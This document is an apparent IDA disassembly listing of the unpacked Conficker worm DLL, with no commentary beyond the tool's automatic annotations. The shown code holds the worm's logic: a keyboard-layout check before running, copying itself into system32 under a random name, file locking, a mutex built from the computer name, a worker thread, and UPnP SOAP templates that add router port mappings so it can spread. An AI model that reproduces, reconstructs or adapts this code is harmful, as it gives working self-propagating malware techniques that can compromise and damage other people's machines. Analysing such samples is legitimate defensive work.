dd 0D0D0D0Dh, 0E0E0E0Eh, 0F0F0F0Fh, 2 dup(10101010h), 2 dup(11111111h)
dd 2 dup(12121212h), 2 dup(13131313h), 4 dup(14141414h)
dd 4 dup(15151515h), 4 dup(16161616h), 4 dup(17171717h)
dd 8 dup(18181818h), 8 dup(19191919h), 8 dup(1A1A1A1Ah)
dd 7 dup(1B1B1B1Bh), 1C1B1B1Bh
dword_9A6028 dd 0 dd 1, 2, 3, 4, 5, 6, 7, 8, 0Ah, 0Ch, 0Eh, 10h, 14h, 18h
dd 1Ch, 20h, 28h, 30h, 38h, 40h, 50h, 60h, 70h, 80h, 0A0h
dd 0C0h, 0E0h, 2 dup(0)
dword_9A60A0 dd 0 dd 1, 2, 3, 4, 6, 8, 0Ch, 10h, 18h, 20h, 30h, 40h, 60h
dd 80h, 0C0h, 100h, 180h, 200h, 300h, 400h, 600h, 800h
dd 0C00h, 1000h, 1800h, 2000h, 3000h, 4000h, 6000h, 9A61B0h
dd 9A61A4h, 9A14D5h, 9A6198h, 9A6188h, 9A617Ch, 9A6168h
dd 9A6158h, 9A6140h, 9A14D5h, 6F636E69h, 7461706Dh, 656C6269h
dd 72657620h, 6E6F6973h, 0
dd 66667562h, 65207265h, 726F7272h, 0
aInsufficientMe db 'insufficient memory',0
aDataError db 'data error',0
align 4
aStreamError db 'stream error',0
align 4
aFileError db 'file error',0
align 4
aStreamEnd db 'stream end',0
align 10h
aNeedDictionary db 'need dictionary',0
aGetSHttp1_1Hos db 'GET %s HTTP/1.1',0Dh,0Ah ; DATA XREF: sub_9B15F5+D1�o
db 'Host: %s:%d',0Dh,0Ah
db 'Connection: Close',0Dh,0Ah
db 0Dh,0Ah,0
asc_9A61F4 db '://',0 ; DATA XREF: sub_9B1801+9�o
aService db 'service',0 ; DATA XREF: sub_9B1C1B+2A�o
; sub_9B1C76+18�o
aUrnSchemasUp_2 db 'urn:schemas-upnp-org:service:WANPPPConnection:1',0
; DATA XREF: .text:009A640C�o
; sub_9B1C76+A4�o
aUrnSchemasUp_1 db 'urn:schemas-upnp-org:service:WANIPConnection:1',0
; DATA XREF: .text:009A6408�o
; sub_9B1C76:loc_9B1D09�o
align 10h
aUrnSchemasUpnp db 'urn:schemas-upnp-org:service:WANCommonInterfaceConfig:1',0
; DATA XREF: sub_9B1C76+39�o
; sub_9B2260+77�o
aScpdurl db 'SCPDURL',0 ; DATA XREF: sub_9B1D81:loc_9B1DEA�o
aEventsuburl db 'eventSubURL',0 ; DATA XREF: sub_9B1D81:loc_9B1DD1�o
aControlurl db 'controlURL',0 ; DATA XREF: sub_9B1D81:loc_9B1DB8�o
align 4
aServicetype db 'serviceType',0 ; DATA XREF: sub_9B1D81:loc_9B1D9F�o
aUrlbase db 'URLBase',0 ; DATA XREF: sub_9B1D81+5�o
align 10h
aPostSHttp1_1Ho db 'POST %s HTTP/1.1',0Dh,0Ah ; DATA XREF: sub_9B1E2A+51�o
db 'Host: %s%s',0Dh,0Ah
db 'User-Agent: POSIX, UPnP/1.0',0Dh,0Ah
db 'Content-Length: %d',0Dh,0Ah
db 'Content-Type: text/xml',0Dh,0Ah
db 'SOAPAction: "%s"',0Dh,0Ah
db 'Connection: Close',0Dh,0Ah
db 'Cache-Control: no-cache',0Dh,0Ah
db 'Pragma: no-cache',0Dh,0Ah
db 0Dh,0Ah,0
align 4
aHu db ':%hu',0 ; DATA XREF: sub_9B1E2A+2D�o
align 8
aContentLength db 'content-length',0 ; DATA XREF: sub_9B1F1B+5�o
align 4
aMSearchHttp1_1 db 'M-SEARCH * HTTP/1.1',0Dh,0Ah ; DATA XREF: sub_9B25D9+103�o
db 'HOST: 239.255.255.250:1900',0Dh,0Ah
db 'ST: %s',0Dh,0Ah
db 'MAN: "ssdp:discover"',0Dh,0Ah
db 'MX: 3',0Dh,0Ah
db 0Dh,0Ah,0
align 4
off_9A6404 dd offset aUrnSchemasUp_0 ; DATA XREF: sub_9B25D9+E8�o
; "urn:schemas-upnp-org:device:InternetGat"...
dd offset aUrnSchemasUp_1 ; "urn:schemas-upnp-org:service:WANIPConne"...
dd offset aUrnSchemasUp_2 ; "urn:schemas-upnp-org:service:WANPPPConn"...
dd offset aUpnpRootdevice ; "upnp:rootdevice"
align 8
aUpnpRootdevice db 'upnp:rootdevice',0 ; DATA XREF: .text:009A6410�o
aUrnSchemasUp_0 db 'urn:schemas-upnp-org:device:InternetGatewayDevice:1',0
; DATA XREF: .text:off_9A6404�o
aSt db 'st',0 ; DATA XREF: sub_9B1F83+6C�o
align 10h
aLocation db 'location',0 ; DATA XREF: sub_9B1F83+47�o
align 4
aConnected db 'Connected',0 ; DATA XREF: sub_9B2221+2B�o
align 4
aSBodySEnvelope db '></s:Body></s:Envelope>',0Dh,0Ah,0 ; DATA XREF: sub_9B234F+102�o
align 8
a?xmlVersion1_1 db '<?xml version="1.0"?>',0Dh,0Ah ; DATA XREF: sub_9B234F+5E�o
db '<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s'
db ':encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Bod'
db 'y><m:%s xmlns:m="%s">',0
align 4
a?xmlVersion1_0 db '<?xml version="1.0"?>',0Dh,0Ah ; DATA XREF: sub_9B234F+45�o
db '<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s'
db ':encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Bod'
db 'y><m:%s xmlns:m="%s"></m:%s></s:Body></s:Envelope>',0Dh,0Ah,0
align 4
aSS db '%s#%s',0 ; DATA XREF: sub_9B234F+23�o
align 10h
a239_255_255_25 db '239.255.255.250',0 ; DATA XREF: sub_9B25D9+7F�o
aErrorcode db 'errorCode',0 ; DATA XREF: sub_9B2909+105�o
; sub_9B2A48+99�o ...
align 4
aNewlastconnect db 'NewLastConnectionError',0 ; DATA XREF: sub_9B2909+86�o
align 4
aNewconnections db 'NewConnectionStatus',0 ; DATA XREF: sub_9B2909+75�o
aNewuptime db 'NewUptime',0 ; DATA XREF: sub_9B2909+64�o
align 4
aGetstatusinfo db 'GetStatusInfo',0 ; DATA XREF: sub_9B2909+3C�o
align 4
aNewexternalipa db 'NewExternalIPAddress',0 ; DATA XREF: sub_9B2A48+6D�o
align 4
aGetexternalipa db 'GetExternalIPAddress',0 ; DATA XREF: sub_9B2A48+45�o
align 4
aNewleasedurati db 'NewLeaseDuration',0 ; DATA XREF: sub_9B2B1F+BB�o
; sub_9B2D2B+196�o
align 4
aAddportmapping db 'AddPortMapping',0 ; DATA XREF: sub_9B2B1F+B3�o
align 4
aNewportmapping db 'NewPortMappingDescription',0 ; DATA XREF: sub_9B2B1F+96�o
; sub_9B2D2B+16F�o
align 4
a1: ; DATA XREF: sub_9B2B1F+8F�o
unicode 0, <1>,0
aNewenabled db 'NewEnabled',0 ; DATA XREF: sub_9B2B1F+88�o
; sub_9B2D2B+148�o
align 4
aNewinternalcli db 'NewInternalClient',0 ; DATA XREF: sub_9B2B1F+81�o
; sub_9B2D2B+FF�o ...
align 4
aNewinternalpor db 'NewInternalPort',0 ; DATA XREF: sub_9B2B1F+7A�o
; sub_9B2D2B+125�o ...
aNewprotocol db 'NewProtocol',0 ; DATA XREF: sub_9B2B1F+70�o
; sub_9B2C56+62�o ...
aNewexternalpor db 'NewExternalPort',0 ; DATA XREF: sub_9B2B1F+66�o
; sub_9B2C56+56�o ...
aNewremotehost db 'NewRemoteHost',0 ; DATA XREF: sub_9B2B1F+60�o
; sub_9B2C56+4D�o ...
align 4
aDeleteportmapp db 'DeletePortMapping',0 ; DATA XREF: sub_9B2C56+45�o
align 4
aNewportmappi_0 db 'NewPortMappingIndex',0 ; DATA XREF: sub_9B2D2B+5A�o
aGetgenericport db 'GetGenericPortMappingEntry',0 ; DATA XREF: sub_9B2D2B+4C�o
align 4
aGetspecificpor db 'GetSpecificPortMappingEntry',0 ; DATA XREF: sub_9B2F2C+5D�o
align 10h
; =============== S U B R O U T I N E =======================================
sub_9A67C0 proc near ; CODE XREF: DllMain(x,x,x)+1D�p
push ebx
mov ebx, dword_9A1218
push ebp
push esi
xor ebp, ebp
push ebp
push ebp
call ebx ; dword_9A1218
mov esi, eax
cmp esi, ebp
jz short loc_9A680A
push edi
shl eax, 2
push eax
push 40h
call dword_9A10C0 ; GlobalAlloc
mov edi, eax
cmp edi, ebp
jz short loc_9A6809
push edi
push esi
call ebx ; dword_9A1218
cmp esi, eax
jnz short loc_9A6802
loc_9A67F0: ; CODE XREF: sub_9A67C0+3B�j
dec esi
cmp word ptr [edi+esi*4], 422h
jz short loc_9A67FF
cmp esi, ebp
jnz short loc_9A67F0
jmp short loc_9A6802
; ---------------------------------------------------------------------------
loc_9A67FF: ; CODE XREF: sub_9A67C0+37�j
xor ebp, ebp
inc ebp
loc_9A6802: ; CODE XREF: sub_9A67C0+2E�j
; sub_9A67C0+3D�j
push edi
call dword_9A10BC ; GlobalFree
loc_9A6809: ; CODE XREF: sub_9A67C0+26�j
pop edi
loc_9A680A: ; CODE XREF: sub_9A67C0+13�j
pop esi
mov eax, ebp
pop ebp
pop ebx
retn
sub_9A67C0 endp
; =============== S U B R O U T I N E =======================================
sub_9A6810 proc near ; CODE XREF: sub_9A6847:loc_9A6869�p
; sub_9A6A3A:loc_9A6B1C�p
push esi
mov esi, offset aCWindowsSystem ; "c:\\windows\\system32\\conficker_unpacked.dll"...
push esi
call sub_9B322E ; strlen
cmp eax, 9
pop ecx
jbe short loc_9A6842
push offset dword_9A12D8
push esi
call sub_9B322E ; strlen
sub esi, 4
pop ecx
add eax, esi
push eax
call dword_9A115C ; _stricmp
test eax, eax
pop ecx
pop ecx
jnz short loc_9A6842
pop esi
retn
; ---------------------------------------------------------------------------
loc_9A6842: ; CODE XREF: sub_9A6810+10�j
; sub_9A6810+2E�j
xor eax, eax
inc eax
pop esi
retn
sub_9A6810 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_9A6847 proc near ; DATA XREF: sub_9A6A3A+CC�o
var_2A8 = byte ptr -2A8h
var_118 = byte ptr -118h
var_14 = byte ptr -14h
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 2A8h
push ebx
push esi
push edi
call sub_9A7F51
call dword_9A10E4 ; GetVersion
cmp ax, 5
jnz short loc_9A6869
call sub_9A7CA0
loc_9A6869: ; CODE XREF: sub_9A6847+1B�j
call sub_9A6810
test eax, eax
mov esi, offset aCWindowsSystem ; "c:\\windows\\system32\\conficker_unpacked.dll"...
jz loc_9A693E
mov edi, 104h
push edi
lea eax, [ebp+var_118]
push eax
call dword_9A10E0 ; GetSystemDirectoryA
call dword_9A11D8 ; rand
push 4
cdq
pop ecx
idiv ecx
lea eax, [ebp+var_14]
add edx, 5
push edx
push eax
call sub_9A7FF2
mov ebx, dword_9A11DC
push edi
lea eax, [ebp+var_118]
push offset dword_9A12E0
push eax
call ebx ; dword_9A11DC
push edi
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_118]
push eax
call ebx ; dword_9A11DC
push edi
lea eax, [ebp+var_118]
push offset dword_9A12D8
push eax
call ebx ; dword_9A11DC
add esp, 2Ch
lea eax, [ebp+var_118]
push eax
push esi
call dword_9A10DC ; MoveFileA
test eax, eax
jnz short loc_9A690D
push 1
lea eax, [ebp+var_118]
push eax
push esi
call dword_9A10D8 ; CopyFileA
test eax, eax
jz short loc_9A693E
push 4
push 0
push esi
call dword_9A10D4 ; MoveFileExA
loc_9A690D: ; CODE XREF: sub_9A6847+A5�j
lea eax, [ebp+var_118]
push eax
call sub_9A8054
lea eax, [ebp+var_118]
push eax
call sub_9A927B
push edi
lea eax, [ebp+var_118]
push eax
push esi
call dword_9A11E0 ; strncpy
add esp, 14h
mov byte_9B55EB, 0
loc_9A693E: ; CODE XREF: sub_9A6847+2E�j
; sub_9A6847+B9�j
push esi
push offset dword_9B55EC
call sub_9A8119
xor edi, edi
cmp eax, edi
pop ecx
pop ecx
mov dword_9B55F4, eax
jz short loc_9A6990
mov ecx, [eax+3Ch]
add ecx, eax
movzx edx, word ptr [ecx+6]
lea edx, [edx+edx*4]
lea edx, [ecx+edx*8+0F8h]
mov ecx, [edx-18h]
add ecx, [edx-14h]
cmp dword_9B55EC, ecx
jbe short loc_9A6990
add eax, ecx
mov dword_9B55F0, eax
mov eax, dword_9B55EC
sub eax, ecx
sub dword_9B55EC, eax
mov dword_9B54E0, eax
loc_9A6990: ; CODE XREF: sub_9A6847+10D�j
; sub_9A6847+12E�j
push edi
push edi
push 3
push edi
mov edi, dword_9A10D0
push 2
mov ebx, 80000000h
push ebx
push esi
call edi ; dword_9A10D0
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jnz short loc_9A69C3
xor eax, eax
push eax
push eax
push 3
push eax
push 3
push ebx
push esi
call edi ; dword_9A10D0
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jz short loc_9A69DE
loc_9A69C3: ; CODE XREF: sub_9A6847+165�j
xor edi, edi
push edi
push edi
push [ebp+var_4]
call dword_9A10CC ; GetFileSize
push eax
push edi
push edi
push [ebp+var_4]
call dword_9A10C8 ; LockFile
jmp short loc_9A69E0
; ---------------------------------------------------------------------------
loc_9A69DE: ; CODE XREF: sub_9A6847+17A�j
xor edi, edi
loc_9A69E0: ; CODE XREF: sub_9A6847+195�j
lea eax, [ebp+var_2A8]
push eax
push 202h
call sub_9B34AE ; WSAStartup
call sub_9AC334
test eax, eax
jz short loc_9A6A04
call sub_9AC843
call sub_9A8F0D
loc_9A6A04: ; CODE XREF: sub_9A6847+1B1�j
mov esi, dword_9A10C4
push 1B7740h
call esi ; dword_9A10C4
call sub_9A98FC
loc_9A6A16: ; CODE XREF: sub_9A6847+1EA�j
push edi
lea eax, [ebp+var_4]
push eax
call dword_9A1240
test eax, eax
jz short loc_9A6A33
call sub_9A991B
push 0A4CB80h
loc_9A6A2F: ; CODE XREF: sub_9A6847+1F1�j
call esi ; dword_9A10C4
jmp short loc_9A6A16
; ---------------------------------------------------------------------------
loc_9A6A33: ; CODE XREF: sub_9A6847+1DC�j
push 0EA60h
jmp short loc_9A6A2F
sub_9A6847 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A6A3A proc near ; CODE XREF: DllMain(x,x,x)+27�p
var_208 = byte ptr -208h
var_109 = byte ptr -109h
var_108 = byte ptr -108h
var_107 = byte ptr -107h
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 208h
push ebx
push esi
push edi
push 3Fh
pop ecx
xor eax, eax
xor ebx, ebx
mov [ebp+var_108], bl
lea edi, [ebp+var_107]
rep stosd
stosw
stosb
push 104h
mov edi, offset aCWindowsSystem ; "c:\\windows\\system32\\conficker_unpacked.dll"...
push edi
push [ebp+arg_0]
call dword_9A10FC ; GetModuleFileNameA
push offset dword_9B55F8
call sub_9A7D25
pop ecx
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_108]
mov esi, 100h
push eax
mov [ebp+var_4], esi
call dword_9A10F8 ; GetComputerNameA
lea eax, [ebp+var_108]
push 7
push eax
call sub_9B322E ; strlen
push eax
lea eax, [ebp+var_108]
push eax
push ebx
call sub_9AD46B
add esp, 10h
push eax
push offset dword_9A12E4
lea eax, [ebp+var_208]
push esi
push eax
call dword_9A11D4 ; _snprintf
add esp, 14h
lea eax, [ebp+var_208]
push eax
push ebx
push ebx
mov [ebp+var_109], bl
call dword_9A10F4 ; CreateMutexA
mov dword_9B54E4, eax
call dword_9A10F0 ; RtlGetLastWin32Error
mov esi, eax
call sub_9A7B0B
cmp esi, 0B7h
jz short loc_9A6B1C
cmp esi, 5
jz short loc_9A6B1C
lea eax, [ebp+var_8]
push eax
push ebx
push ebx
push offset sub_9A6847
push ebx
push ebx
call dword_9A10EC ; CreateThread
push eax
call dword_9A10E8 ; CloseHandle
jmp short loc_9A6B2F
; ---------------------------------------------------------------------------
loc_9A6B1C: ; CODE XREF: sub_9A6A3A+BF�j
; sub_9A6A3A+C4�j
call sub_9A6810
test eax, eax
jz short loc_9A6B2F
push 4
push ebx
push edi
call dword_9A10D4 ; MoveFileExA
loc_9A6B2F: ; CODE XREF: sub_9A6A3A+E0�j
; sub_9A6A3A+E9�j
pop edi
pop esi
pop ebx
leave
retn
sub_9A6A3A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; BOOL __stdcall DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
_DllMain@12 proc near ; CODE XREF: DllEntryPoint+4B�p
hinstDLL = dword ptr 8
fdwReason = dword ptr 0Ch
lpvReserved = dword ptr 10h
push ebp
mov ebp, esp
cmp [ebp+fdwReason], 1
jnz short loc_9A6B6C
cmp [ebp+lpvReserved], 0
push esi
mov esi, [ebp+lpvReserved]
jnz short loc_9A6B4A
mov esi, [ebp+hinstDLL]
loc_9A6B4A: ; CODE XREF: DllMain(x,x,x)+11�j
push esi
call dword_9A1100 ; DisableThreadLibraryCalls
call sub_9A67C0
test eax, eax
jnz short loc_9A6B61
push esi
call sub_9A6A3A
pop ecx
loc_9A6B61: ; CODE XREF: DllMain(x,x,x)+24�j
cmp [ebp+lpvReserved], 0
pop esi
jz short loc_9A6B6C
xor eax, eax
jmp short loc_9A6B6F
; ---------------------------------------------------------------------------
loc_9A6B6C: ; CODE XREF: DllMain(x,x,x)+7�j
; DllMain(x,x,x)+32�j
xor eax, eax
inc eax
loc_9A6B6F: ; CODE XREF: DllMain(x,x,x)+36�j
pop ebp
retn 0Ch
_DllMain@12 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A6B73 proc near ; CODE XREF: sub_9A6D4E+26�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
and [ebp+var_8], 0
and [ebp+var_4], 0
and dword ptr [edi], 0
push esi
lea eax, [ebp+var_8]
push eax
push offset dword_9A1304
push 1
push 0
push offset dword_9A12F4
call dword_9A12BC
mov esi, eax
test esi, esi
jl short loc_9A6BC1
mov eax, [ebp+var_8]
mov ecx, [eax]
lea edx, [ebp+var_4]
push edx
push eax
call dword ptr [ecx+1Ch]
mov esi, eax
test esi, esi
jl short loc_9A6BC1
mov eax, [ebp+var_4]
mov ecx, [eax]
push edi
push eax
call dword ptr [ecx+1Ch]
mov esi, eax
loc_9A6BC1: ; CODE XREF: sub_9A6B73+2D�j
; sub_9A6B73+40�j
mov eax, [ebp+var_4]
test eax, eax
jz short loc_9A6BCE
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_9A6BCE: ; CODE XREF: sub_9A6B73+53�j
mov eax, [ebp+var_8]
test eax, eax
jz short loc_9A6BDB
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_9A6BDB: ; CODE XREF: sub_9A6B73+60�j
mov eax, esi
pop esi
leave
retn
sub_9A6B73 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A6BE0 proc near ; CODE XREF: sub_9A6C5C+1F�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = word ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
and dword ptr [esi], 0
mov ecx, [eax]
and [ebp+var_8], 0
and [ebp+var_C], 0
push ebx
lea edx, [ebp+var_C]
push edx
push eax
call dword ptr [ecx+48h]
mov ebx, eax
test ebx, ebx
jl short loc_9A6C3D
mov eax, [ebp+var_C]
mov ecx, [eax]
lea edx, [ebp+var_8]
push edx
push [ebp+arg_4]
push [ebp+arg_0]
push eax
call dword ptr [ecx+28h]
test eax, eax
jl short loc_9A6C3B
mov eax, [ebp+var_8]
mov ecx, [eax]
lea edx, [ebp+var_4]
push edx
push eax
call dword ptr [ecx+4Ch]
mov ebx, eax
test ebx, ebx
jl short loc_9A6C3D
cmp [ebp+var_4], 0
jz short loc_9A6C3D
mov dword ptr [esi], 1
jmp short loc_9A6C3D
; ---------------------------------------------------------------------------
loc_9A6C3B: ; CODE XREF: sub_9A6BE0+37�j
xor ebx, ebx
loc_9A6C3D: ; CODE XREF: sub_9A6BE0+20�j
; sub_9A6BE0+4A�j ...
mov eax, [ebp+var_8]
test eax, eax
jz short loc_9A6C4A
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_9A6C4A: ; CODE XREF: sub_9A6BE0+62�j
mov eax, [ebp+var_C]
test eax, eax
jz short loc_9A6C57
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_9A6C57: ; CODE XREF: sub_9A6BE0+6F�j
mov eax, ebx
pop ebx
leave
retn
sub_9A6BE0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A6C5C proc near ; CODE XREF: sub_9A6D4E+3F�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
push edi
push [ebp+arg_4]
xor ebx, ebx
push [ebp+arg_0]
lea esi, [ebp+var_C]
mov edi, eax
mov [ebp+var_10], ebx
mov [ebp+var_4], ebx
mov [ebp+var_8], ebx
call sub_9A6BE0
mov esi, eax
cmp esi, ebx
pop ecx
pop ecx
jl loc_9A6D23
cmp [ebp+var_C], ebx
jnz loc_9A6D23
mov eax, [edi]
lea ecx, [ebp+var_8]
push ecx
push edi
call dword ptr [eax+48h]
mov esi, eax
cmp esi, ebx
jl short loc_9A6D23
lea eax, [ebp+var_4]
push eax
push offset dword_9A1324
push 1
push ebx
push offset dword_9A1314
call dword_9A12BC
mov esi, eax
cmp esi, ebx
jl short loc_9A6D23
mov eax, [ebp+var_4]
push [ebp+arg_0]
mov ecx, [eax]
push eax
call dword ptr [ecx+38h]
mov esi, eax
cmp esi, ebx
jl short loc_9A6D23
mov eax, [ebp+var_4]
push [ebp+arg_4]
mov ecx, [eax]
push eax
call dword ptr [ecx+30h]
mov esi, eax
cmp esi, ebx
jl short loc_9A6D23
push [ebp+arg_8]
call dword_9A11F4
mov edi, eax
push edi
call dword_9A11F8
test eax, eax
jnz short loc_9A6D03
mov esi, 8007000Eh
jmp short loc_9A6D26
; ---------------------------------------------------------------------------
loc_9A6D03: ; CODE XREF: sub_9A6C5C+9E�j
mov eax, [ebp+var_4]
mov ecx, [eax]
push edi
push eax
call dword ptr [ecx+20h]
mov esi, eax
cmp esi, ebx
jl short loc_9A6D26
mov eax, [ebp+var_8]
push [ebp+var_4]
mov ecx, [eax]
push eax
call dword ptr [ecx+20h]
mov esi, eax
jmp short loc_9A6D26
; ---------------------------------------------------------------------------
loc_9A6D23: ; CODE XREF: sub_9A6C5C+2A�j
; sub_9A6C5C+33�j ...
mov edi, [ebp+var_10]
loc_9A6D26: ; CODE XREF: sub_9A6C5C+A5�j
; sub_9A6C5C+B5�j ...
push edi
call dword_9A11FC
mov eax, [ebp+var_4]
cmp eax, ebx
jz short loc_9A6D3A
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_9A6D3A: ; CODE XREF: sub_9A6C5C+D6�j
mov eax, [ebp+var_8]
cmp eax, ebx
jz short loc_9A6D47
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_9A6D47: ; CODE XREF: sub_9A6C5C+E3�j
pop edi
mov eax, esi
pop esi
pop ebx
leave
retn
sub_9A6C5C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A6D4E proc near ; CODE XREF: sub_9AC0EF+4D�p
var_4 = dword ptr -4
arg_0 = word ptr 8
push ebp
mov ebp, esp
push ecx
push ebx
push esi
xor ebx, ebx
push 6
push ebx
mov [ebp+var_4], ebx
call dword_9A12C0
mov esi, eax
cmp esi, 80010106h
jz short loc_9A6D70
cmp esi, ebx
jl short loc_9A6D9C
loc_9A6D70: ; CODE XREF: sub_9A6D4E+1C�j
push edi
lea edi, [ebp+var_4]
call sub_9A6B73
test eax, eax
pop edi
jl short loc_9A6D9C
movzx eax, [ebp+arg_0]
push offset aWww ; "WWW"
push 6
push eax
mov eax, [ebp+var_4]
call sub_9A6C5C
add esp, 0Ch
test eax, eax
jl short loc_9A6D9C
xor ebx, ebx
inc ebx
loc_9A6D9C: ; CODE XREF: sub_9A6D4E+20�j
; sub_9A6D4E+2E�j ...
mov eax, [ebp+var_4]
test eax, eax
jz short loc_9A6DA9
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_9A6DA9: ; CODE XREF: sub_9A6D4E+53�j
test esi, esi
jl short loc_9A6DB3
call dword_9A12B8
loc_9A6DB3: ; CODE XREF: sub_9A6D4E+5D�j
pop esi
mov eax, ebx
pop ebx
leave
retn
sub_9A6D4E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A6DB9 proc near ; CODE XREF: sub_9A7077+69�p
var_104 = byte ptr -104h
var_103 = byte ptr -103h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 104h
push esi
push edi
push 3Fh
pop ecx
xor eax, eax
mov [ebp+var_104], 0
lea edi, [ebp+var_103]
rep stosd
stosw
stosb
mov esi, 100h
push esi
lea eax, [ebp+var_104]
push eax
call dword_9A128C ; gethostname
cmp eax, 0FFFFFFFFh
jnz short loc_9A6E07
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_104]
push eax
mov [ebp+var_4], esi
call dword_9A10F8 ; GetComputerNameA
loc_9A6E07: ; CODE XREF: sub_9A6DB9+38�j
call sub_9A7D84
push eax
lea eax, [ebp+var_104]
push eax
call sub_9B322E ; strlen
push eax
lea eax, [ebp+var_104]
push eax
push 0
call sub_9AD46B
mov esi, [ebp+arg_0]
add esp, 10h
push eax
push offset a08x08x ; "%08x%08x"
push ebx
push esi
call dword_9A11D4 ; _snprintf
add esp, 14h
pop edi
mov byte ptr [esi+ebx-1], 0
pop esi
leave
retn
sub_9A6DB9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A6E48 proc near ; CODE XREF: sub_9A6FD2+45�p
; sub_9A7077+52�p
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push 20h
push offset stru_9A1348
call __SEH_prolog
mov eax, [ebp+arg_C]
xor esi, esi
mov [ebp+var_1C], esi
mov [ebp+ms_exc.disabled], esi
mov [ebp+var_28], eax
cmp eax, esi
jz short loc_9A6E77
push eax
call dword_9A1288 ; inet_ntoa
push eax
call dword_9A11CC ; _strdup
pop ecx
jmp short loc_9A6E79
; ---------------------------------------------------------------------------
loc_9A6E77: ; CODE XREF: sub_9A6E48+1C�j
xor eax, eax
loc_9A6E79: ; CODE XREF: sub_9A6E48+2D�j
mov [ebp+var_24], eax
push esi
push esi
push eax
push 7D0h
call sub_9B25D9
add esp, 10h
mov [ebp+var_2C], eax
cmp eax, esi
jz short loc_9A6EC2
mov ecx, eax
loc_9A6E95: ; CODE XREF: sub_9A6E48+56�j
mov [ebp+var_20], ecx
cmp ecx, esi
jz short loc_9A6EA0
mov ecx, [ecx]
jmp short loc_9A6E95
; ---------------------------------------------------------------------------
loc_9A6EA0: ; CODE XREF: sub_9A6E48+52�j
push 10h
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
push eax
call sub_9B2260
add esp, 14h
mov [ebp+var_30], eax
cmp eax, esi
jz short loc_9A6EC2
mov [ebp+var_1C], 1
loc_9A6EC2: ; CODE XREF: sub_9A6E48+49�j
; sub_9A6E48+71�j
push [ebp+var_24]
call dword_9A11D0 ; free
pop ecx
jmp short loc_9A6ED5
; ---------------------------------------------------------------------------
loc_9A6ECE: ; DATA XREF: .text:stru_9A1348�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9A6ED2: ; DATA XREF: .text:stru_9A1348�o
mov esp, [ebp+ms_exc.old_esp]
loc_9A6ED5: ; CODE XREF: sub_9A6E48+84�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov eax, [ebp+var_1C]
call __SEH_epilog
retn
sub_9A6E48 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A6EE2 proc near ; CODE XREF: sub_9A7077+7C�p
var_F8 = byte ptr -0F8h
var_B8 = byte ptr -0B8h
var_68 = byte ptr -68h
var_58 = byte ptr -58h
var_48 = dword ptr -48h
var_44 = byte ptr -44h
var_3C = byte ptr -3Ch
var_34 = byte ptr -34h
var_2F = byte ptr -2Fh
var_2C = dword ptr -2Ch
var_28 = byte ptr -28h
var_20 = byte ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push 0E8h
push offset stru_9A1360
call __SEH_prolog
mov edi, ecx
xor ebx, ebx
mov [ebp+ms_exc.disabled], ebx
mov [ebp+var_1C], ebx
loc_9A6EFB: ; CODE XREF: sub_9A6EE2+D7�j
push [ebp+var_1C]
push offset dword_9A1358
push 6
lea eax, [ebp+var_34]
push eax
call dword_9A11D4 ; _snprintf
mov [ebp+var_2F], bl
mov [ebp+var_F8], bl
mov [ebp+var_44], bl
mov [ebp+var_58], bl
mov [ebp+var_B8], bl
mov [ebp+var_28], bl
mov [ebp+var_3C], bl
mov [ebp+var_68], bl
mov esi, [ebp+arg_0]
add esi, 484h
lea eax, [ebp+var_58]
